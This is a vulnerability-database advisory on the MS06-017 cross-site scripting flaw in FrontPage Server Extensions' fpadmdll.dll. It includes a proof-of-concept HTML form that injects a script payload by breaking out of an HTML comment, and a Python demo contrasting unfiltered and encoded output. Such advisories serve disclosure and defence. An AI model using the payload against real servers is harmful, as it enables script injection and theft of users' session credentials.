Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability (MS06-017)

Vulnerability ID: 1110047
Vulnerability type: Cross-site scripting
Published: 2006-04-11
Updated: 2006-04-13
CVE ID: CVE-2006-0015
CNNVD-ID: CNNVD-200604-154
Platform: CGI
CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/27620
https://www.securityfocus.com/bid/17452
https://cxsecurity.com/issue/WLB-2006040037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-154
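|Vulnerability details
FrontPage Server Extensions are the server-side extensions for FrontPage; used together with IIS, they make it easy to manage, create, and browse FrontPage-extended web sites. FrontPage Server Extensions contain an input validation vulnerability in the handling of HTML pages, and a remote attacker may be able to execute arbitrary script code on the client machine. Some parameters in fpadmdll.dll of FrontPage Server Extensions do not properly filter specific input that is returned to the user, which leads to a cross-site scripting issue and may allow an attacker to execute malicious script code in the client's browser with the privileges of the current session. Exploiting this vulnerability requires user interaction. The vulnerable parameters in fpadmdll.dll are operation, command, and name. These parameters appear in the output without being properly filtered, but can be escaped with "-->".
|Exploit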
source: http://www.securityfocus.com/bid/17452/info

Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim user's account. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

<form action=http://www.example.com/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>
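The comment breakout described in the details, and the effect of HTML-encoding the reflected value, as an added example that is not part of the original advisory or of Microsoft's code. The page template and the helper names are hypothetical; the template assumes the parameter is echoed inside an HTML comment, as the "-->" prefix implies.

```python
import html
from html.parser import HTMLParser

# Hypothetical page template (assumption): echoes a request parameter inside
# an HTML comment. It stands in for the server's output, which is not shown here.
TEMPLATE = "<html><body><!-- operation={value} --><p>Report</p></body></html>"

# The "operation" value from the form above.
SAMPLE_VALUE = "--><script>alert()</script>"


class TagCollector(HTMLParser):
    """Collects the start tags and comments an HTML parser sees in a page."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.comments = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_comment(self, data):
        self.comments.append(data)


def render_unfiltered(value):
    """Reflect the value as-is (the flawed behaviour described above)."""
    return TEMPLATE.format(value=value)


def render_encoded(value):
    """Reflect the value after HTML-encoding <, >, & and quotes."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def parse(markup):
    """Parse a rendered page and return the collector with what was seen."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


if __name__ == "__main__":
    for render in (render_unfiltered, render_encoded):
        seen = parse(render(SAMPLE_VALUE))
        print(render.__name__, "tags:", seen.tags, "comments:", seen.comments)
```

With the unfiltered render the comment ends at the injected "-->" and a script element appears in the parsed page; with the encoded render the whole value stays inside a single comment.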
|Affected products
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Standar
|References

Source: BID
Name: 17452
Link: http://www.securityfocus.com/bid/17452
Source: MS
Name: MS06-017
Link: http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
Source: VUPEN
Name: ADV-2006-1322
Link: http://www.frsirt.com/english/advisories/2006/1322
Source: MISC
Link: http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
Source: SECTRACK
Name: 1015896
Link: http://securitytracker.com/id?1015896
Source: SECTRACK
Name: 1015895
Link: http://securitytracker.com/id?1015895
Source: SECUNIA
Name: 19623
Link: http://secunia.com/advisories/19623
Source: BUGTRAQ
Name: 20060412 Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting
Link: http://www.securityfocus.com/archive/1/archive/1/430803/100/0/threaded
Source: XF
Name: fpse-html-xss(25537)
Link: http://xforce.iss.net/xforce/xfdb/25537
Source: SREASON
Name: 704
Link: http://securityreason.com/securityalert/704
Source: US Government Resource: oval:org.mitre.oval:def:1748
Name: oval:org.mitre.oval:def:1748
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1748